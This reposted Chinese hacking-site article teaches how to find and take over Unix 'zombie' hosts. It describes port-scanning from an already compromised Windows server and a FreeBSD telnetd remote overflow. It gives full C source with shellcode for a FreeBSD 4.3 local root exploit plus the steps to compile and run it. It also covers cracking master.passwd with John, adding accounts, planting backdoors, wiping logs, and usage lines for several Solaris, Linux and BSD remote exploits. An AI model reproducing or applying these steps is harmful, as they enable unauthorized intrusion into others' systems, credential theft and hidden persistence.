当前位置:七道奇文章资讯安全技术网络技术
日期:2009-11-01 13:04:00  来源:本站整理

教你探求unix肉鸡_若何探求unix肉鸡[网络技术]

赞助商链接



  本文“教你探求unix肉鸡_若何探求unix肉鸡[网络技术]”是由七道奇为您精心收集,来源于网络转载,文章版权归文章作者所有,本站不对其观点以及内容做任何评价,请读者自行判断,以下是其具体内容:
为什么说是我和x-laser一同找肉鸡呢?因为我们的一切操作全部是在3389肉鸡上举行的.首先我们都上到同一个终端,(前提:终端是对方开的,而不是你自己做的,这样才有终端服务管理器可用)然后用管理工具中的终端管理举行id切换(挑选用户举行衔接)
hack58.net/article/UploadPic/2009-11/2009111102528886.jpg" target="_blank">hack58.net/article/UploadPic/2009-11/2009111102528886.jpg" border="0" style="display: block; margin: 0px auto 10px; width: 415px; text-align: center" style="cursor:pointer;"/>这样,两个人便可以彼此掌握对方了,一举一动都很清楚,这种办法很好,大大提高了效率,也增添了入侵时的爱好.倡议大家奉行 :)
    下面我们开始工作.由于是在win上搞unix类,所以我们最好要有在win上用的exploit,以得到第一台unix肉鸡.关于在win上用的exploits可以用cygwin编译(在www.isfocus.com)有下载.大概直接去大鹰的主页(e4gle.org)大概红客技术同盟(www.cnhonker.net/old.php)下载,注意了,要一同下那个cygwin1.dll的文件,不然搞不成.
目前我们要做的是找出大量unix的肉鸡,然后再去找漏洞,但是怎么找呢?这时刻,就请出了我们的languard network scanner,在做了简单的设置让他跑的快点后,我们就开始扫描
hack58.net/article/UploadPic/2009-11/2009111102529603.jpg" target="_blank">hack58.net/article/UploadPic/2009-11/2009111102529603.jpg" border="0" style="display: block; margin: 0px auto 10px; width: 415px; text-align: center" style="cursor:pointer;"/>我们看到有一台freebsd,这个系统对比好欺凌,因为前段时间有个沸沸扬扬的telnetd远程溢出漏洞.当然我们也可以用superscan来快速判断操作系统.我们用superscan扫23端口,因为telnet上去普通都有banner,从而得知操作系统范例.以下hack58.net/article/UploadPic/2009-11/2009111102529567.jpg" target="_blank">hack58.net/article/UploadPic/2009-11/2009111102529567.jpg" border="0" style="display: block; margin: 0px auto 10px; width: 415px; text-align: center" style="cursor:pointer;"/>我们扫到了两台linux,….. ..#..’是linux的判断符.
……..#..’..$则是sunos的判断符,如此等等,大家用用就有经验了.hack58.net/article/UploadPic/2009-11/2009111102530773.jpg" target="_blank">hack58.net/article/UploadPic/2009-11/2009111102530773.jpg" border="0" style="display: block; margin: 0px auto 10px; width: 415px; text-align: center" style="cursor:pointer;"/>言归正转,来看我们的freebsd.我们在红盟下好bsd.exe和cygwin1.dll后,就开始溢出了.

由于要发送16M的东西,所以大概会慢点
等到成功后,会呈现 command ?
这是输入 id
可以看到自己已经成为root了.当然,大家还可以把shadow抓下来,bsd下的sh
adow文件是/etc/master.passwd,然后john跑个用户名出来(在www.xfocus.net有john的hack58.net/" target="_blank">windows下的版本下载,也是用cygwin编译的),再telnet上去,就得到了普通帐号(因为root帐号普通对比难破),再举行本地溢出.为什么要这么麻烦呢?因为我们远程得到的shell很多都没有回显,所以不便利增添帐号.普通在bsd下增添帐号是在/usr/sbin下履行./adduser ,然后按着提醒做便可以了,bsd系统很安定,很多大型网站都是用这个建站,比方红盟.本地溢出的代码我在这里贴一下

?受影响版本: FreeBSD 4.3 4.2 4.1 4.0

早期版本大概受影响 测试程序利用办法: 

netdemon%gcc -o vvbsd vvbsd.c netdemon%cp /bin/sh /tmp netdemon%./vvbsd vvfreebsd. Written by Georgi Guninski shall jump to bfbffe71 child=61056 login: login: # done #   

发现 FreeBSD 4.3 存在一个计划上的漏洞,它答应用户在别的进程中插入 signal handlers.

题出在 rfork(RFPROC|RFSIGSHARE) ,假如子进程 exec() 一个 setuid 程序,然后父进程设置一个 signal handlers,这个 signal handlers 将会在子进程中被复制.发送一个信号给子进程将能招致 signal handlers 被履行. 操纵此漏洞,本地攻击者能获得 root 权限. vvfreebsd.c 

    ???? /* FreeBSD 4.3 local root exploit using shared signals. Written by Georgi Guninski http://www.guninski.com */ #include <stdio.h> #include <signal.h> #include <unistd.h> int vv1; #define MYSIG SIGINT //exec "/tm
    p/sh", shellcode gotten from the internet and modified unsigned char bsdshell[] = "\x90\x90\x90\x90\x90\x90\x90\x90" "\x31\xc0\x50\x50\xb0\xb7\xcd\x80" "\x31\xc0\x50\x50\xb0\x17\xcd\x80" "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f" "\x74\x6d\x70\x89\xe3\x50\x53\x50\x54\x53" "\xb0\x3b\x50\xcd\x80\x90\x90\x90"; typedef (*PROG)(); extern char **environ; int main(int ac,char **av) { int pid; //(*(PROG)bsdshell)(); if(!(vv1=getenv("vv"))) { setenv("vv",bsdshell,1); if(!execle(av[0],"vv",NULL,environ)) { perror("weird exec"); exit(1); } } printf("vvfreebsd. Written by Georgi Guninski\n"); printf("shall jump to %x\n",vv1); if(!(pid=rfork(RFPROC|RFSIGSHARE))) { printf("child=%d\n",getpid()); // /usr/bin/login and rlogin work for me. ping gives nonsuid shell // if(!execl("/usr/bin/rlogin","rlogin","localhost",0)) if(!execl("/usr/bin/login","login",0)) { perror("exec setuid failed"); exit(2); }; } sleep(2); signal(MYSIG,(sig_t)vv1); sleep(2); kill(pid,MYSIG); printf("done\n"
); while(42); }

/* www.xcode.tw.st 极度网络安全小组 */


可以找到可写的地方,然后cat >vv.c 回车
(鼠标右健粘贴)
ctrl + d保存
$gcc –o vv vv.c编译(gcc在solaris和aix等系统下叫做cc)
$cp /bin/csh /tmp
$./vv
这样就履行了,普通可以得到root.注意第二句,这是代码的需求
然后就去adduser然后再放一堆后门上去吧
几点增补:1.号令w查看当前哪些在线,如果瞥见root就要当心了 2
.Whereis gcc查看装了gcc没有,whereis的用法很机动
3假如没装就需求把编译好的传上去,我们普通是申请一个ftp,然后编译好,传到ftp上,在让攻击的机子去下载(51.net的虚拟主机便可以完成这项任务)
4记得每次上去要用wipe清理足迹,wipe在小凤居有下载
 


别的再附几种常见的exploit的用法


目标主机一概用128.0.0.1替换! 1 statdu[vdp]redhat6.xrpc status远程溢出!

溢出程序: statdx 用法:

./statdx -d 0 128.0.0.1大概

./statdx -d 1 128.0.0.1大概

./statdx -d 2 128.0.0.1

2 sadmind[vdp]sun solaris sparc 2.6.2.7远程溢出

溢出程序: sadmindxbrute 用法

./sadmindxbrute (主机范例参数) 128.0.0.1 主机参数 1 x86 2.6 2 x86 7.0 3 sparc 2.6 4 sparc 7.0 3 ttdb[tcp]sun solaris 2.3 2.4 2.5 2.5.12.6远程溢出 

所用程序 ttds(已经改名)流光iv的exploit内可以找到

用法: ./ttds 128.0.0.1 80(攻击断口设置为80)-v6 4 snmp[bdp]sun solaris sparc 7.0/8.8远程溢出

所用程序 snmpxmid

用法: ./snmpxmid 128.0.0.1 -v 7 5 bind 远程溢出

程序bind

用法: ./bind 128.0.0.1 -e 6 irix的telnet远程溢出(这个大概用流光iv扫描不到)

所用程序telnetd

用法: ./telnetd 128.0.0.1 7 utofsd[vdp]bsd autofsd远程溢出,tcp 530 root shell

所用程序 utofsd

用法: ./utofsd 128.0.0.1 8 freebsd远程溢出

这个可以通过www.paching.net/liumy写的bsd攻击程序在winnt下利用办法 bsd 128.0.0.1 其他的远程溢出程序也不麻烦 你只要把程序编译好之后输入 ./程序名 --h便可以看到帮忙了!

   增补一点,很多写exploit的牛人为了让自己的exploit给真正的黑客用,成心在代码里放了几个错误,所以大家还是要学好编程的这样,便可以按照gcc编译器的错误提醒把错误的代码改过来.本日我们讲了怎样找unix类肉鸡,当然还是要看运气,不过我和x-laser在3389肉鸡扫描很猖獗,用superscan一次普通是扫255个c段用languard也扫的很多,所以倡议大家多多实践.最后,奉劝一句,不要入侵国内,不要搞破坏!


  以上是“教你探求unix肉鸡_若何探求unix肉鸡[网络技术]”的内容,如果你对以上该文章内容感兴趣,你可以看看七道奇为您推荐以下文章:
  • 教你探求unix肉鸡_若何探求unix肉鸡
  • 本文地址: 与您的QQ/BBS好友分享!
    • 好的评价 如果您觉得此文章好,就请您
        0%(0)
    • 差的评价 如果您觉得此文章差,就请您
        0%(0)

    文章评论评论内容只代表网友观点,与本站立场无关!

       评论摘要(共 0 条,得分 0 分,平均 0 分) 查看完整评论
    Copyright © 2020-2022 www.xiamiku.com. All Rights Reserved .